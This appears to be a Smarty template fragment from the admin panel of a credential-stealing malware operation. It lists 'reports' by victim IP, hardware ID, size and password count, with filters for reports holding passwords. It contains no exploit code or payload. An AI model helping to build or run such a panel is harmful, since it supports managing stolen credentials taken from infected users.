{if {$smarty.request.routine|default:''} == 'confirm_clear_reports'} {assign var='msg' value="Are you sure you want to delete all reports?"} {assign var='yes_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=reports&routine=clear_reports"} {assign var='no_code' value={$smarty.server.SCRIPT_NAME}|cat:"?action=reports"} {include file='confirm.tpl'} {/if} {if $smarty.request.filter_string|default:'' != '' || $smarty.request.filter_ip|default:'' != '' || $smarty.request.filter_hwid|default:'' != '' || $smarty.request.filter_nonparsed|default:'' != '' || $smarty.request.filter_has_passwords|default:'' != ''}
| Report | IP | Add time | Processed | The size | Passwords | |
|---|---|---|---|---|---|---|
| {else} {if $report_item.report_id == '0' || $report_item.report_id == ''} | $report_item.report_idOpen | {/if}{country base_path="includes/design/images/flags/" country_code=$report_item.report_country simple='1'} {$report_item.report_source_ip} | {$report_item.import_time} | {$report_item.parsed|yes_no} | {$report_item.report_len|file_size} | {$report_item.count} |